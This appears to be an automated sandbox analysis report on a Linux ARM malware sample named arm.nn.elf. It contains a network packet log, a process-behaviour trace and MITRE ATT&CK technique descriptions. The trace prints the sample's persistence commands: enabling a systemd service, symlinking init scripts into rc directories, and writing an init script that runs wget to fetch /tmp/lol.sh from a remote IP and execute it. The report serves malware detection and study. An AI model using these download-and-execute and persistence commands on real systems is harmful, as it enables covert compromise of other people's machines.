Dec 24, 2024 05:34:26.185868979 CET	38242	60116	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:26.571259022 CET	60116	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:26.731072903 CET	38242	60116	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:27.206254959 CET	38242	60116	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:27.206387043 CET	60116	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:27.572536945 CET	60118	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:27.692617893 CET	38242	60118	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:27.692701101 CET	60118	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:27.692715883 CET	60118	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:27.813276052 CET	38242	60118	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:28.198318958 CET	60118	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:28.359069109 CET	38242	60118	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:28.810100079 CET	38242	60118	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:28.810242891 CET	60118	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:29.200139046 CET	60120	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:29.319957018 CET	38242	60120	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:29.320085049 CET	60120	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:29.320179939 CET	60120	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:29.439713955 CET	38242	60120	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:29.826606989 CET	60120	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:29.987118006 CET	38242	60120	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:30.443707943 CET	38242	60120	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:30.443856001 CET	60120	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:30.828396082 CET	60122	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:30.947988987 CET	38242	60122	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:30.948116064 CET	60122	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:30.948199987 CET	60122	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:31.067888021 CET	38242	60122	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:31.453629017 CET	60122	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:31.619168997 CET	38242	60122	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:32.070825100 CET	38242	60122	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:32.070987940 CET	60122	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:32.455128908 CET	60124	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:32.574831009 CET	38242	60124	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:32.574995041 CET	60124	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:32.575061083 CET	60124	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:32.694588900 CET	38242	60124	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:33.080578089 CET	60124	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:33.243083000 CET	38242	60124	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:33.705667019 CET	38242	60124	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:33.705790997 CET	60124	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:34.081787109 CET	60126	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:34.201354980 CET	38242	60126	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:34.201438904 CET	60126	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:34.201476097 CET	60126	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:34.321230888 CET	38242	60126	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:34.706861019 CET	60126	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:34.867269039 CET	38242	60126	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:35.708812952 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:35.828519106 CET	38242	60128	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:35.828772068 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:35.828957081 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:35.948468924 CET	38242	60128	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:36.335589886 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:36.499140978 CET	38242	60128	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:36.948800087 CET	38242	60128	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:36.948911905 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:37.337757111 CET	60130	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:37.457658052 CET	38242	60130	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:37.457827091 CET	60130	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:37.457921028 CET	60130	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:37.577542067 CET	38242	60130	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:37.965176105 CET	60130	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:38.127171993 CET	38242	60130	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:38.572170973 CET	38242	60130	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:38.572451115 CET	60130	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:38.968085051 CET	60132	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:39.088085890 CET	38242	60132	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:39.088553905 CET	60132	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:39.088553905 CET	60132	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:39.208842993 CET	38242	60132	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:39.599844933 CET	60132	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:39.767853022 CET	38242	60132	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:40.205471039 CET	38242	60132	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:40.205959082 CET	60132	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:40.602463007 CET	60134	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:40.722780943 CET	38242	60134	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:40.723167896 CET	60134	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:40.723457098 CET	60134	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:40.843281031 CET	38242	60134	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:41.235677004 CET	60134	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:41.403230906 CET	38242	60134	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:41.847486019 CET	38242	60134	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:41.847980022 CET	60134	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:42.237945080 CET	60136	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:42.357791901 CET	38242	60136	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:42.358273983 CET	60136	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:42.358517885 CET	60136	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:42.478360891 CET	38242	60136	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:42.870887995 CET	60136	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:43.035507917 CET	38242	60136	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:43.489639997 CET	38242	60136	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:43.489854097 CET	60136	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:43.872590065 CET	60138	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:43.992383957 CET	38242	60138	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:43.992844105 CET	60138	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:43.993128061 CET	60138	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:44.112709045 CET	38242	60138	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:44.503247023 CET	60138	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:44.667124987 CET	38242	60138	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:45.104348898 CET	38242	60138	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:45.104811907 CET	60138	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:45.506190062 CET	60140	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:45.625936985 CET	38242	60140	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:45.626334906 CET	60140	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:45.626569986 CET	60140	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:45.746609926 CET	38242	60140	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:46.137842894 CET	60140	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:46.303154945 CET	38242	60140	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:46.742690086 CET	38242	60140	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:46.743138075 CET	60140	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:47.140014887 CET	60142	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:47.260210991 CET	38242	60142	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:47.260478973 CET	60142	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:47.260720968 CET	60142	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:47.384582043 CET	38242	60142	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:47.772515059 CET	60142	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:47.935528994 CET	38242	60142	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:48.377032995 CET	38242	60142	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:48.377424955 CET	60142	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:48.775595903 CET	60144	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:48.898255110 CET	38242	60144	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:48.898603916 CET	60144	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:48.898603916 CET	60144	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:49.018465042 CET	38242	60144	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:49.411185980 CET	60144	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:49.571357012 CET	38242	60144	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:50.018383980 CET	38242	60144	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:50.018807888 CET	60144	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:50.413382053 CET	60146	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:50.533257961 CET	38242	60146	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:50.533521891 CET	60146	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:50.533521891 CET	60146	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:50.653516054 CET	38242	60146	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:51.045670986 CET	60146	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:51.207412958 CET	38242	60146	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:51.654774904 CET	38242	60146	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:51.655332088 CET	60146	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:52.048974037 CET	60148	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:52.169106960 CET	38242	60148	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:52.169599056 CET	60148	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:52.169713974 CET	60148	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:52.289720058 CET	38242	60148	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:52.683876991 CET	60148	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:52.847529888 CET	38242	60148	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:53.285893917 CET	38242	60148	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:53.286411047 CET	60148	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:53.688077927 CET	60150	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:53.808473110 CET	38242	60150	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:53.808880091 CET	60150	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:53.808999062 CET	60150	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:53.929284096 CET	38242	60150	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:54.322324038 CET	60150	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:54.483527899 CET	38242	60150	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:54.952227116 CET	38242	60150	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:54.952689886 CET	60150	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:55.325035095 CET	60152	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:55.445226908 CET	38242	60152	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:55.445390940 CET	60152	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:55.445487976 CET	60152	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:55.565227032 CET	38242	60152	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:55.958172083 CET	60152	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:56.098181009 CET	38242	60126	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:56.098584890 CET	60126	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:56.119266987 CET	38242	60152	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:56.576553106 CET	38242	60152	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:56.576841116 CET	60152	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:56.960772038 CET	60154	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:57.081161022 CET	38242	60154	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:57.081378937 CET	60154	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:57.081378937 CET	60154	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:57.201350927 CET	38242	60154	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:57.591630936 CET	60154	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:57.759047031 CET	38242	60154	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:58.199289083 CET	38242	60154	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:58.199549913 CET	60154	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:58.593234062 CET	60156	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:58.713103056 CET	38242	60156	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:58.713340998 CET	60156	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:58.713418007 CET	60156	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:58.833112955 CET	38242	60156	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:59.219247103 CET	60156	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:34:59.379189968 CET	38242	60156	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:59.850435972 CET	38242	60156	94.156.227.234	192.168.2.23
Dec 24, 2024 05:34:59.850786924 CET	60156	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:35:00.220894098 CET	60158	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:35:00.340689898 CET	38242	60158	94.156.227.234	192.168.2.23
Dec 24, 2024 05:35:00.340982914 CET	60158	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:35:00.341204882 CET	60158	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:35:00.460830927 CET	38242	60158	94.156.227.234	192.168.2.23
Dec 24, 2024 05:35:00.846942902 CET	60158	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:35:01.007266045 CET	38242	60158	94.156.227.234	192.168.2.23
Dec 24, 2024 05:35:01.459165096 CET	38242	60158	94.156.227.234	192.168.2.23
Dec 24, 2024 05:35:01.459254980 CET	60158	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:35:01.848664045 CET	60160	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:35:01.968417883 CET	38242	60160	94.156.227.234	192.168.2.23
Dec 24, 2024 05:35:01.968538046 CET	60160	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:35:01.968616009 CET	60160	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:35:02.088421106 CET	38242	60160	94.156.227.234	192.168.2.23
Dec 24, 2024 05:35:02.476603985 CET	60160	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:35:02.639240980 CET	38242	60160	94.156.227.234	192.168.2.23
Dec 24, 2024 05:35:03.087445021 CET	38242	60160	94.156.227.234	192.168.2.23
Dec 24, 2024 05:35:03.087759018 CET	60160	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:35:03.478374958 CET	60162	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:35:03.598973036 CET	38242	60162	94.156.227.234	192.168.2.23
Dec 24, 2024 05:35:03.599075079 CET	60162	38242	192.168.2.23	94.156.227.234

System Behavior

Analysis Process: dash PID: 6225, Parent PID: 4331

General

Start time (UTC):	04:32:50
Start date (UTC):	24/12/2024
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	04:32:50
Start date (UTC):	24/12/2024
Path:	/usr/bin/rm
Arguments:	rm -f /tmp/tmp.euLig1AMQx /tmp/tmp.MKEFwQBc8l /tmp/tmp.p9eEBykA8q
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Start time (UTC):	04:32:50
Start date (UTC):	24/12/2024
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	04:32:50
Start date (UTC):	24/12/2024
Path:	/usr/bin/rm
Arguments:	rm -f /tmp/tmp.euLig1AMQx /tmp/tmp.MKEFwQBc8l /tmp/tmp.p9eEBykA8q
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Start time (UTC):	04:32:56
Start date (UTC):	24/12/2024
Path:	/tmp/arm.nn.elf
Arguments:	/tmp/arm.nn.elf
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time (UTC):	04:32:56
Start date (UTC):	24/12/2024
Path:	/tmp/arm.nn.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time (UTC):	04:32:56
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "systemctl enable custom.service >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	04:32:56
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	04:32:56
Start date (UTC):	24/12/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl enable custom.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Start time (UTC):	04:32:56
Start date (UTC):	24/12/2024
Path:	/tmp/arm.nn.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time (UTC):	04:32:56
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	04:32:56
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	04:32:56
Start date (UTC):	24/12/2024
Path:	/usr/bin/chmod
Arguments:	chmod +x /etc/init.d/system
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Start time (UTC):	04:32:56
Start date (UTC):	24/12/2024
Path:	/tmp/arm.nn.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time (UTC):	04:32:56
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	04:32:56
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	04:32:56
Start date (UTC):	24/12/2024
Path:	/usr/bin/ln
Arguments:	ln -s /etc/init.d/system /etc/rcS.d/S99system
File size:	76160 bytes
MD5 hash:	e933cf05571f62c0157d4e2dfcaea282

Start time (UTC):	04:32:56
Start date (UTC):	24/12/2024
Path:	/tmp/arm.nn.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time (UTC):	04:32:56
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm.nn.elf'\n /tmp/arm.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping arm.nn.elf'\n killall arm.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start\|stop\|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/arm.nn.elf"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	04:32:57
Start date (UTC):	24/12/2024
Path:	/tmp/arm.nn.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time (UTC):	04:32:57
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "chmod +x /etc/init.d/arm.nn.elf >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	04:32:57
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	04:32:57
Start date (UTC):	24/12/2024
Path:	/usr/bin/chmod
Arguments:	chmod +x /etc/init.d/arm.nn.elf
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Start time (UTC):	04:32:57
Start date (UTC):	24/12/2024
Path:	/tmp/arm.nn.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time (UTC):	04:32:57
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	04:32:57
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	04:32:57
Start date (UTC):	24/12/2024
Path:	/usr/bin/mkdir
Arguments:	mkdir -p /etc/rc.d
File size:	88408 bytes
MD5 hash:	088c9d1df5a28ed16c726eca15964cb7

Start time (UTC):	04:32:57
Start date (UTC):	24/12/2024
Path:	/tmp/arm.nn.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time (UTC):	04:32:57
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "ln -s /etc/init.d/arm.nn.elf /etc/rc.d/S99arm.nn.elf >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	04:32:57
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	04:32:57
Start date (UTC):	24/12/2024
Path:	/usr/bin/ln
Arguments:	ln -s /etc/init.d/arm.nn.elf /etc/rc.d/S99arm.nn.elf
File size:	76160 bytes
MD5 hash:	e933cf05571f62c0157d4e2dfcaea282

Start time (UTC):	04:32:57
Start date (UTC):	24/12/2024
Path:	/tmp/arm.nn.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time (UTC):	04:32:57
Start date (UTC):	24/12/2024
Path:	/tmp/arm.nn.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time (UTC):	04:32:56
Start date (UTC):	24/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	04:32:56
Start date (UTC):	24/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Start time (UTC):	04:32:56
Start date (UTC):	24/12/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	04:32:56
Start date (UTC):	24/12/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Start time (UTC):	04:32:57
Start date (UTC):	24/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	04:32:57
Start date (UTC):	24/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Start time (UTC):	04:32:57
Start date (UTC):	24/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	04:32:57
Start date (UTC):	24/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User Unix Shell s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system ( `/etc` ) and the user’s home directory ( `~/` ) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation
Platforms:	Linux, macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
